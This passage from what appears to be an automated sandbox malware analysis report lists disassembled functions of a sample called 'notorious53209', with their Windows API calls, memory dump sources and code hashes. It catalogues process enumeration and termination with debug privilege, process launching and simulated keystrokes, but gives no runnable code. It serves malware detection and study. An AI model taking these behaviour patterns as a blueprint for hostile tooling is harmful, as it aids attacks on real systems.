                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00907093
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 009070A7
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009070C1
                                                  • _wcscat.LIBCMT ref: 0090711C
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00907133
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00907161
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 608ea60312eb7e6470f1958ddf6cb6f9418f72e1f40b2534eadc6ca91c423d95
                                                  • Instruction ID: 47ecaec8856fb12bab78f5a25f61a613ab12aa9a4e0bdf2c0e72061c08e2142a
                                                  • Opcode Fuzzy Hash: 608ea60312eb7e6470f1958ddf6cb6f9418f72e1f40b2534eadc6ca91c423d95
                                                  • Instruction Fuzzy Hash: 95419171904308AFEB219FA4CC85BEEB7BCEF48364F10052AF544E71D1D672AD859B60
                                                  Function 008FEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 008E3EB6
                                                    • Part of subcall function 008E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 008E3EC4
                                                    • Part of subcall function 008E3E91: CloseHandle.KERNEL32(00000000), ref: 008E3F8E
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FECB8
                                                  • GetLastError.KERNEL32 ref: 008FECCB
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FECFA
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 008FED77
                                                  • GetLastError.KERNEL32(00000000), ref: 008FED82
                                                  • CloseHandle.KERNEL32(00000000), ref: 008FEDB7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: 02176194a601eb0821fe74333e1fca265b0c2d2edca2cb71549785318f2d1961
                                                  • Instruction ID: b42b4b09e8a46844c7e6ff439df55b65ae39def953f5a2b1c550fafb21fa66e9
                                                  • Opcode Fuzzy Hash: 02176194a601eb0821fe74333e1fca265b0c2d2edca2cb71549785318f2d1961
                                                  • Instruction Fuzzy Hash: E9418A712042159FDB24EF28C8A5F7DB7A1FF80714F088059FA82DB2D2DB75A904CB92
                                                  Function 008E3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 008E32C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: ef0d3efbdb96aa155d6898e7498e8433aa18235857ecd7374851025a9f50410e
                                                  • Instruction ID: 456522e57599aadf6aee3bfecc7f8c9937915b31f1cc567a268e8b4c5655bd40
                                                  • Opcode Fuzzy Hash: ef0d3efbdb96aa155d6898e7498e8433aa18235857ecd7374851025a9f50410e
                                                  • Instruction Fuzzy Hash: A011EB3160C3C67AE7015A56DC46D6BB39CFF1B375F10002AFA44D7181D6659F4049A6
                                                  Function 008E4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008E454E
                                                  • LoadStringW.USER32(00000000), ref: 008E4555
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008E456B
                                                  • LoadStringW.USER32(00000000), ref: 008E4572
                                                  • _wprintf.LIBCMT ref: 008E4598
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008E45B6
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 008E4593
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: 0eedb7a6efe10e21f75454f0c2458e56283114994af92aab0091103df7da31c0
                                                  • Instruction ID: f8317b5a5dbc6ada890f1f2c1133576defc400ac50be8ebc3ef4da23d2959546
                                                  • Opcode Fuzzy Hash: 0eedb7a6efe10e21f75454f0c2458e56283114994af92aab0091103df7da31c0
                                                  • Instruction Fuzzy Hash: 8C014FF290420CBFE760EBA49D89EE7776CE708301F0005A5BB49D2451EA759F859B71
                                                  Function 00882A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?), ref: 00882ACF
                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00882B17
                                                  • ShowWindow.USER32(FFFFFFFF,00000006), ref: 008BC46A
                                                  • ShowWindow.USER32(FFFFFFFF,?), ref: 008BC4D6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: 59e2f2be689b6c127b6f28c3105d6784d270edbd6febd781a9fdd6b433848b32
                                                  • Instruction ID: 09d939f7b7c486880674222e363c9df78e23778219046dcabf74f1e949edbd08
                                                  • Opcode Fuzzy Hash: 59e2f2be689b6c127b6f28c3105d6784d270edbd6febd781a9fdd6b433848b32
                                                  • Instruction Fuzzy Hash: B9414774218694AEC73DAB2CCC9CBBF7B92FF86314F18881DE057C6660C635A941D711
                                                  Function 008E7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 008E737F
                                                    • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                                    • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008E73B6
                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 008E73D2
                                                  • _memmove.LIBCMT ref: 008E7420
                                                  • _memmove.LIBCMT ref: 008E743D
                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 008E744C
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008E7461
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7480
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  • Opcode ID: 5113eae84917cc9d2b305c9ce559ba484b00603f775db5ca06555400420a6398
                                                  • Instruction ID: 9b33ca9e90b86da2dca5429b30fd32dcaab73e18acaa633d3e1fa26bdc3bd638
                                                  • Opcode Fuzzy Hash: 5113eae84917cc9d2b305c9ce559ba484b00603f775db5ca06555400420a6398
                                                  • Instruction Fuzzy Hash: A9319E35908205EFDF10EF69DC85AAE7BB8FF45710F1440A5F904EB286DB709A10DBA1
                                                  Function 00906442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 0090645A
                                                  • GetDC.USER32(00000000), ref: 00906462
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0090646D
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00906479
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009064B5
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009064C6
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00906500
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00906520
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: 15ea53a85a3be54a4a7b44a7b8d61d5a435a04d21e44c8c3008c64f66430e6bc
                                                  • Instruction ID: 6e659f3285ebf0d82216aa053d38e5e15433843f4a85c91547ff7eedc4a7084e
                                                  • Opcode Fuzzy Hash: 15ea53a85a3be54a4a7b44a7b8d61d5a435a04d21e44c8c3008c64f66430e6bc
                                                  • Instruction Fuzzy Hash: 6A318D72214214BFEF208F10CC4AFEA3FADEF0A765F044065FE089A191C7759951CB60
                                                  Function 008DC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: e6f5592e65a6500b1fbf310a70ec024746f8f8c28d9d2f65e428a0db94a2c62d
                                                  • Instruction ID: 9929096bfbd8d22e19f4b3fbeca64e77befc67e5255d4ca2028cede652ffd511
                                                  • Opcode Fuzzy Hash: e6f5592e65a6500b1fbf310a70ec024746f8f8c28d9d2f65e428a0db94a2c62d
                                                  • Instruction Fuzzy Hash: 6721077174061BB7EA10B6249D46FAB339CFF61398F080122FE05D6782EB11DD21C2E6
                                                  Function 00881424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8efd0b2531ac7e32160b8d979c5f3fcf41fb807617801d7a7fdd69bafbdb4c11
                                                  • Instruction ID: 16bf42286dad2bdf9c0d66e4b240cbd7d44965dfb6168a2601e0519f009de0e8
                                                  • Opcode Fuzzy Hash: 8efd0b2531ac7e32160b8d979c5f3fcf41fb807617801d7a7fdd69bafbdb4c11
                                                  • Instruction Fuzzy Hash: 69717A30904109EFCF14EF98CC89ABEBB79FF85314F148159F915EA251DB34AA52CBA4
                                                  Function 0090B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindow.USER32(00AD23F8), ref: 0090B6A5
                                                  • IsWindowEnabled.USER32(00AD23F8), ref: 0090B6B1
                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0090B795
                                                  • SendMessageW.USER32(00AD23F8,000000B0,?,?), ref: 0090B7CC
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 0090B809
                                                  • GetWindowLongW.USER32(00AD23F8,000000EC), ref: 0090B82B
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0090B843
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  • Opcode ID: 6e8b806e937bb6cfea4b94db9dac9ecf70aa3f680dd1a76b45b98e59305fd566
                                                  • Instruction ID: c0877fd123610631f38fa2c5aec147bf9ae9aff9ea9796bff97f9c89c3c6d43d
                                                  • Opcode Fuzzy Hash: 6e8b806e937bb6cfea4b94db9dac9ecf70aa3f680dd1a76b45b98e59305fd566
                                                  • Instruction Fuzzy Hash: CE719A75604304AFDB209F64C8A4FAABBFDFF8A310F144469E946973E1C732A981DB51
                                                  Function 008FF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008FF75C
                                                  • _memset.LIBCMT ref: 008FF825
                                                  • ShellExecuteExW.SHELL32(?), ref: 008FF86A
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                    • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                                  • GetProcessId.KERNEL32(00000000), ref: 008FF8E1
                                                  • CloseHandle.KERNEL32(00000000), ref: 008FF910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: 1ad014635a49c9d957b16914cdc7e785cfebfff0b0c9dfb23b2eb779f9910a5e
                                                  • Instruction ID: 2f41508400bfdd31c317bb17234e144bbe49acbf62fcacc51171e7a22db83769
                                                  • Opcode Fuzzy Hash: 1ad014635a49c9d957b16914cdc7e785cfebfff0b0c9dfb23b2eb779f9910a5e
                                                  • Instruction Fuzzy Hash: FE618D75A00619DFCF14EF68C9849AEBBF5FF48310B148469E956EB352CB30AD41CB91
                                                  Function 008E145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(?), ref: 008E149C
                                                  • GetKeyboardState.USER32(?), ref: 008E14B1
                                                  • SetKeyboardState.USER32(?), ref: 008E1512
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 008E1540
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 008E155F
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 008E15A5
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008E15C8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                                                  • Instruction ID: cfed01f45b64007e617a8503e344aa8ae53ab6b57aa6770c412ef0fc7318cf0b
                                                  • Opcode Fuzzy Hash: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                                                  • Instruction Fuzzy Hash: F451E2B06087D53EFF32422A8C49BBABEAABB47304F084489E1D6C58D2C7A4DC84D751
                                                  Function 008E1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 008E12B5
                                                  • GetKeyboardState.USER32(?), ref: 008E12CA
                                                  • SetKeyboardState.USER32(?), ref: 008E132B
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008E1357
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008E1374
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008E13B8
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008E13D9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                                                  • Instruction ID: 28b320c564a4ed642ae5dda84621dd1ef513401b6c04f2f6a7e13b7fe46de27f
                                                  • Opcode Fuzzy Hash: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
